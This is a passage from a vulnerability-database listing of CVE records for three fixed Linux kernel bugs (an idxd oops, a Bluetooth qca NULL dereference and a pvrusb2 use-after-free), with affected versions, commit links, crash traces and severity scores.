              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.158",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.90",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.30",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.9",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: idxd: Fix oops during rmmod on single-CPU platforms\n\nDuring the removal of the idxd driver, registered offline callback is\ninvoked as part of the clean up process. However, on systems with only\none CPU online, no valid target is available to migrate the\nperf context, resulting in a kernel oops:\n\n    BUG: unable to handle page fault for address: 000000000002a2b8\n    #PF: supervisor write access in kernel mode\n    #PF: error_code(0x0002) - not-present page\n    PGD 1470e1067 P4D 0\n    Oops: 0002 [#1] PREEMPT SMP NOPTI\n    CPU: 0 PID: 20 Comm: cpuhp/0 Not tainted 6.8.0-rc6-dsa+ #57\n    Hardware name: Intel Corporation AvenueCity/AvenueCity, BIOS BHSDCRB1.86B.2492.D03.2307181620 07/18/2023\n    RIP: 0010:mutex_lock+0x2e/0x50\n    ...\n    Call Trace:\n    \u003cTASK\u003e\n    __die+0x24/0x70\n    page_fault_oops+0x82/0x160\n    do_user_addr_fault+0x65/0x6b0\n    __pfx___rdmsr_safe_on_cpu+0x10/0x10\n    exc_page_fault+0x7d/0x170\n    asm_exc_page_fault+0x26/0x30\n    mutex_lock+0x2e/0x50\n    mutex_lock+0x1e/0x50\n    perf_pmu_migrate_context+0x87/0x1f0\n    perf_event_cpu_offline+0x76/0x90 [idxd]\n    cpuhp_invoke_callback+0xa2/0x4f0\n    __pfx_perf_event_cpu_offline+0x10/0x10 [idxd]\n    cpuhp_thread_fun+0x98/0x150\n    smpboot_thread_fn+0x27/0x260\n    smpboot_thread_fn+0x1af/0x260\n    __pfx_smpboot_thread_fn+0x10/0x10\n    kthread+0x103/0x140\n    __pfx_kthread+0x10/0x10\n    ret_from_fork+0x31/0x50\n    __pfx_kthread+0x10/0x10\n    ret_from_fork_asm+0x1b/0x30\n    \u003cTASK\u003e\n\nFix the issue by preventing the migration of the perf context to an\ninvalid target."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:10:01.608Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/9edd3aa34d50f27b97be30b2ba4a6af0945ff56b"
        },
        {
          "url": "https://git.kernel.org/stable/c/023b6390a15a98f9c3aa5e7da78d485d5384a08e"
        },
        {
          "url": "https://git.kernel.org/stable/c/f976eca36cdf94e32fa4f865db0e7c427c9aa33c"
        },
        {
          "url": "https://git.kernel.org/stable/c/47533176fdcef17b114a6f688bc872901c1ec6bb"
        },
        {
          "url": "https://git.kernel.org/stable/c/f221033f5c24659dc6ad7e5cf18fb1b075f4a8be"
        }
      ],
      "title": "dmaengine: idxd: Fix oops during rmmod on single-CPU platforms",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35989",
    "datePublished": "2024-05-20T09:47:55.084Z",
    "dateReserved": "2024-05-17T13:50:33.146Z",
    "dateUpdated": "2025-05-04T09:10:01.608Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35851 (GCVE-0-2024-35851)

Vulnerability from cvelistv5 – Published: 2024-05-17 14:47 – Updated: 2025-05-04 09:06

Title

Bluetooth: qca: fix NULL-deref on non-serdev suspend

Summary

In the Linux kernel, the following vulnerability has been resolved: Bluetooth: qca: fix NULL-deref on non-serdev suspend Qualcomm ROME controllers can be registered from the Bluetooth line discipline and in this case the HCI UART serdev pointer is NULL. Add the missing sanity check to prevent a NULL-pointer dereference when wakeup() is called for a non-serdev controller during suspend. Just return true for now to restore the original behaviour and address the crash with pre-6.2 kernels, which do not have commit e9b3e5b8c657 ("Bluetooth: hci_qca: only assign wakeup with serial port support") that causes the crash to happen already at setup() time.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/52f9041deaca3fc5c…
	https://git.kernel.org/stable/c/e60502b907be350c5…
	https://git.kernel.org/stable/c/6b47cdeb786c38e41…
	https://git.kernel.org/stable/c/b64092d2f108f0cd1…
	https://git.kernel.org/stable/c/73e87c0a49fda31d7…

Impacted products

Vendor

Product

Version

Linux

Affected: c1a74160eaf1ac218733b371158432b52601beff , < 52f9041deaca3fc5c40ef3b9cb943993ec7d2489 (git)
Affected: c1a74160eaf1ac218733b371158432b52601beff , < e60502b907be350c518819297b565007a94c706d (git)
Affected: c1a74160eaf1ac218733b371158432b52601beff , < 6b47cdeb786c38e4174319218db3fa6d7b4bba88 (git)
Affected: c1a74160eaf1ac218733b371158432b52601beff , < b64092d2f108f0cd1d7fd7e176f5fb2a67a2f189 (git)
Affected: c1a74160eaf1ac218733b371158432b52601beff , < 73e87c0a49fda31d7b589edccf4c72e924411371 (git)

Linux

Affected: 5.13
Unaffected: 0 , < 5.13 (semver)
Unaffected: 5.15.158 , ≤ 5.15.* (semver)
Unaffected: 6.1.90 , ≤ 6.1.* (semver)
Unaffected: 6.6.30 , ≤ 6.6.* (semver)
Unaffected: 6.8.9 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35851",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-28T19:42:46.493832Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:17.737Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.657Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/52f9041deaca3fc5c40ef3b9cb943993ec7d2489"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e60502b907be350c518819297b565007a94c706d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6b47cdeb786c38e4174319218db3fa6d7b4bba88"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b64092d2f108f0cd1d7fd7e176f5fb2a67a2f189"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/73e87c0a49fda31d7b589edccf4c72e924411371"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/bluetooth/hci_qca.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "52f9041deaca3fc5c40ef3b9cb943993ec7d2489",
              "status": "affected",
              "version": "c1a74160eaf1ac218733b371158432b52601beff",
              "versionType": "git"
            },
            {
              "lessThan": "e60502b907be350c518819297b565007a94c706d",
              "status": "affected",
              "version": "c1a74160eaf1ac218733b371158432b52601beff",
              "versionType": "git"
            },
            {
              "lessThan": "6b47cdeb786c38e4174319218db3fa6d7b4bba88",
              "status": "affected",
              "version": "c1a74160eaf1ac218733b371158432b52601beff",
              "versionType": "git"
            },
            {
              "lessThan": "b64092d2f108f0cd1d7fd7e176f5fb2a67a2f189",
              "status": "affected",
              "version": "c1a74160eaf1ac218733b371158432b52601beff",
              "versionType": "git"
            },
            {
              "lessThan": "73e87c0a49fda31d7b589edccf4c72e924411371",
              "status": "affected",
              "version": "c1a74160eaf1ac218733b371158432b52601beff",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/bluetooth/hci_qca.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.13"
            },
            {
              "lessThan": "5.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.158",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.90",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.30",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.158",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.90",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.30",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.9",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: qca: fix NULL-deref on non-serdev suspend\n\nQualcomm ROME controllers can be registered from the Bluetooth line\ndiscipline and in this case the HCI UART serdev pointer is NULL.\n\nAdd the missing sanity check to prevent a NULL-pointer dereference when\nwakeup() is called for a non-serdev controller during suspend.\n\nJust return true for now to restore the original behaviour and address\nthe crash with pre-6.2 kernels, which do not have commit e9b3e5b8c657\n(\"Bluetooth: hci_qca: only assign wakeup with serial port support\") that\ncauses the crash to happen already at setup() time."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:06:50.045Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/52f9041deaca3fc5c40ef3b9cb943993ec7d2489"
        },
        {
          "url": "https://git.kernel.org/stable/c/e60502b907be350c518819297b565007a94c706d"
        },
        {
          "url": "https://git.kernel.org/stable/c/6b47cdeb786c38e4174319218db3fa6d7b4bba88"
        },
        {
          "url": "https://git.kernel.org/stable/c/b64092d2f108f0cd1d7fd7e176f5fb2a67a2f189"
        },
        {
          "url": "https://git.kernel.org/stable/c/73e87c0a49fda31d7b589edccf4c72e924411371"
        }
      ],
      "title": "Bluetooth: qca: fix NULL-deref on non-serdev suspend",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35851",
    "datePublished": "2024-05-17T14:47:28.787Z",
    "dateReserved": "2024-05-17T13:50:33.105Z",
    "dateUpdated": "2025-05-04T09:06:50.045Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26875 (GCVE-0-2024-26875)

Vulnerability from cvelistv5 – Published: 2024-04-17 10:27 – Updated: 2025-05-04 08:58

Title

media: pvrusb2: fix uaf in pvr2_context_set_notify

Summary

In the Linux kernel, the following vulnerability has been resolved: media: pvrusb2: fix uaf in pvr2_context_set_notify [Syzbot reported] BUG: KASAN: slab-use-after-free in pvr2_context_set_notify+0x2c4/0x310 drivers/media/usb/pvrusb2/pvrusb2-context.c:35 Read of size 4 at addr ffff888113aeb0d8 by task kworker/1:1/26 CPU: 1 PID: 26 Comm: kworker/1:1 Not tainted 6.8.0-rc1-syzkaller-00046-gf1a27f081c1f #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/25/2024 Workqueue: usb_hub_wq hub_event Call Trace: <TASK> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0xd9/0x1b0 lib/dump_stack.c:106 print_address_description mm/kasan/report.c:377 [inline] print_report+0xc4/0x620 mm/kasan/report.c:488 kasan_report+0xda/0x110 mm/kasan/report.c:601 pvr2_context_set_notify+0x2c4/0x310 drivers/media/usb/pvrusb2/pvrusb2-context.c:35 pvr2_context_notify drivers/media/usb/pvrusb2/pvrusb2-context.c:95 [inline] pvr2_context_disconnect+0x94/0xb0 drivers/media/usb/pvrusb2/pvrusb2-context.c:272 Freed by task 906: kasan_save_stack+0x33/0x50 mm/kasan/common.c:47 kasan_save_track+0x14/0x30 mm/kasan/common.c:68 kasan_save_free_info+0x3f/0x60 mm/kasan/generic.c:640 poison_slab_object mm/kasan/common.c:241 [inline] __kasan_slab_free+0x106/0x1b0 mm/kasan/common.c:257 kasan_slab_free include/linux/kasan.h:184 [inline] slab_free_hook mm/slub.c:2121 [inline] slab_free mm/slub.c:4299 [inline] kfree+0x105/0x340 mm/slub.c:4409 pvr2_context_check drivers/media/usb/pvrusb2/pvrusb2-context.c:137 [inline] pvr2_context_thread_func+0x69d/0x960 drivers/media/usb/pvrusb2/pvrusb2-context.c:158 [Analyze] Task A set disconnect_flag = !0, which resulted in Task B's condition being met and releasing mp, leading to this issue. [Fix] Place the disconnect_flag assignment operation after all code in pvr2_context_disconnect() to avoid this issue.

Severity ?

6.4 (Medium)


                        
                          CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/ed8000e1e8e9684ab…
	https://git.kernel.org/stable/c/d29ed08964cec8b97…
	https://git.kernel.org/stable/c/ab896d93fd6a2cd1a…
	https://git.kernel.org/stable/c/eb6e9dce979c08210…
	https://git.kernel.org/stable/c/3a1ec89708d2e57e2…
	https://git.kernel.org/stable/c/8e60b99f6b7ccb3ba…
	https://git.kernel.org/stable/c/40cd818fae875c424…
	https://git.kernel.org/stable/c/eaa410e05bdf562c9…
	https://git.kernel.org/stable/c/0a0b79ea55de8514e…

Impacted products

Vendor

Product

Version

Linux

Affected: e5be15c63804e05b5a94197524023702a259e308 , < ed8000e1e8e9684ab6c30cf2b526c0cea039929c (git)
Affected: e5be15c63804e05b5a94197524023702a259e308 , < d29ed08964cec8b9729bc55c7bb23f679d7a18fb (git)
Affected: e5be15c63804e05b5a94197524023702a259e308 , < ab896d93fd6a2cd1afeb034c3cc9226cb499209f (git)
Affected: e5be15c63804e05b5a94197524023702a259e308 , < eb6e9dce979c08210ff7249e5e0eceb8991bfcd7 (git)
Affected: e5be15c63804e05b5a94197524023702a259e308 , < 3a1ec89708d2e57e2712f46241282961b1a7a475 (git)
Affected: e5be15c63804e05b5a94197524023702a259e308 , < 8e60b99f6b7ccb3badeb512f5eb613ad45904592 (git)
Affected: e5be15c63804e05b5a94197524023702a259e308 , < 40cd818fae875c424a8335009db33c7b5a07de3a (git)
Affected: e5be15c63804e05b5a94197524023702a259e308 , < eaa410e05bdf562c90b23cdf2d9327f9c4625e16 (git)
Affected: e5be15c63804e05b5a94197524023702a259e308 , < 0a0b79ea55de8514e1750884e5fec77f9fdd01ee (git)

Linux

Affected: 2.6.26
Unaffected: 0 , < 2.6.26 (semver)
Unaffected: 4.19.311 , ≤ 4.19.* (semver)
Unaffected: 5.4.273 , ≤ 5.4.* (semver)
Unaffected: 5.10.214 , ≤ 5.10.* (semver)
Unaffected: 5.15.153 , ≤ 5.15.* (semver)
Unaffected: 6.1.83 , ≤ 6.1.* (semver)
Unaffected: 6.6.23 , ≤ 6.6.* (semver)
Unaffected: 6.7.11 , ≤ 6.7.* (semver)
Unaffected: 6.8.2 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.434Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ed8000e1e8e9684ab6c30cf2b526c0cea039929c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d29ed08964cec8b9729bc55c7bb23f679d7a18fb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ab896d93fd6a2cd1afeb034c3cc9226cb499209f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/eb6e9dce979c08210ff7249e5e0eceb8991bfcd7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3a1ec89708d2e57e2712f46241282961b1a7a475"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8e60b99f6b7ccb3badeb512f5eb613ad45904592"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/40cd818fae875c424a8335009db33c7b5a07de3a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/eaa410e05bdf562c90b23cdf2d9327f9c4625e16"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0a0b79ea55de8514e1750884e5fec77f9fdd01ee"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "ed8000e1e8e9",
                "status": "affected",
                "version": "e5be15c63804",
                "versionType": "custom"
              },
              {
                "lessThan": "d29ed08964ce",
                "status": "affected",
                "version": "e5be15c63804",
                "versionType": "custom"
              },
              {
                "lessThan": "ab896d93fd6a",
                "status": "affected",
                "version": "e5be15c63804",
                "versionType": "custom"
              },
              {
                "lessThan": "eb6e9dce979c",
                "status": "affected",
                "version": "e5be15c63804",
                "versionType": "custom"
              },
              {
                "lessThan": "3a1ec89708d2",
                "status": "affected",
                "version": "e5be15c63804",
                "versionType": "custom"
              },
              {
                "lessThanOrEqual": "8e60b99f6b7c",
                "status": "affected",
                "version": "e5be15c63804",
                "versionType": "custom"
              },
              {
                "lessThan": "40cd818fae87",
                "status": "affected",
                "version": "e5be15c63804",
                "versionType": "custom"
              },
              {
                "lessThan": "eaa410e05bdf",
                "status": "affected",
                "version": "e5be15c63804",
                "versionType": "custom"
              },
              {
                "lessThan": "0a0b79ea55de",
                "status": "affected",
                "version": "e5be15c63804",
                "versionType": "custom"
              },
              {
                "status": "affected",
                "version": "2.6.26"
              },
              {
                "lessThan": "2.6.26",
                "status": "unaffected",
                "version": "0",
                "versionType": "custom"
              },
              {
                "lessThanOrEqual": "4.20",
                "status": "unaffected",
                "version": "4.19.311",
                "versionType": "custom"
              },
              {
                "lessThanOrEqual": "5.5",
                "status": "unaffected",
                "version": "5.4.273",
                "versionType": "custom"
              },
              {
                "lessThanOrEqual": "5.11",
                "status": "unaffected",
                "version": "5.10.214",
                "versionType": "custom"
              },
              {
                "lessThanOrEqual": "5.16",
                "status": "unaffected",
                "version": "5.15.153",
                "versionType": "custom"
              },
              {
                "lessThanOrEqual": "6.2",
                "status": "unaffected",
                "version": "6.183",
                "versionType": "custom"
              },
              {
                "lessThanOrEqual": "6.7",
                "status": "unaffected",
                "version": "6.6.23",
                "versionType": "custom"
              },
              {
                "lessThanOrEqual": "6.8",
                "status": "unaffected",
                "version": "6.7.11",
                "versionType": "custom"
              },
              {
                "lessThanOrEqual": "6.9",
                "status": "unaffected",
                "version": "6.8.2",
                "versionType": "custom"
              },
              {
                "lessThanOrEqual": "*",
                "status": "unaffected",
                "version": "6.9",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "HIGH",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 6.4,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "HIGH",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-26875",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-08-08T18:16:38.134267Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-416",
                "description": "CWE-416 Use After Free",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-02-11T21:47:07.560Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/media/usb/pvrusb2/pvrusb2-context.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "ed8000e1e8e9684ab6c30cf2b526c0cea039929c",
              "status": "affected",
              "version": "e5be15c63804e05b5a94197524023702a259e308",
              "versionType": "git"
            },
            {
              "lessThan": "d29ed08964cec8b9729bc55c7bb23f679d7a18fb",
              "status": "affected",
              "version": "e5be15c63804e05b5a94197524023702a259e308",
              "versionType": "git"
            },
            {
              "lessThan": "ab896d93fd6a2cd1afeb034c3cc9226cb499209f",
              "status": "affected",
              "version": "e5be15c63804e05b5a94197524023702a259e308",
              "versionType": "git"
            },
            {
              "lessThan": "eb6e9dce979c08210ff7249e5e0eceb8991bfcd7",
              "status": "affected",
              "version": "e5be15c63804e05b5a94197524023702a259e308",
              "versionType": "git"
            },
            {
              "lessThan": "3a1ec89708d2e57e2712f46241282961b1a7a475",
              "status": "affected",
              "version": "e5be15c63804e05b5a94197524023702a259e308",
              "versionType": "git"
            },
            {
              "lessThan": "8e60b99f6b7ccb3badeb512f5eb613ad45904592",
              "status": "affected",
              "version": "e5be15c63804e05b5a94197524023702a259e308",
              "versionType": "git"
            },
            {
              "lessThan": "40cd818fae875c424a8335009db33c7b5a07de3a",
              "status": "affected",
              "version": "e5be15c63804e05b5a94197524023702a259e308",
              "versionType": "git"
            },
            {
              "lessThan": "eaa410e05bdf562c90b23cdf2d9327f9c4625e16",
              "status": "affected",
              "version": "e5be15c63804e05b5a94197524023702a259e308",
              "versionType": "git"
            },
            {
              "lessThan": "0a0b79ea55de8514e1750884e5fec77f9fdd01ee",
              "status": "affected",
              "version": "e5be15c63804e05b5a94197524023702a259e308",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/media/usb/pvrusb2/pvrusb2-context.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.26"
            },
            {
              "lessThan": "2.6.26",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.311",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.273",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.214",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.153",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.83",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.23",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.311",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.273",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.214",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.153",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.83",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.23",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.11",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.2",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
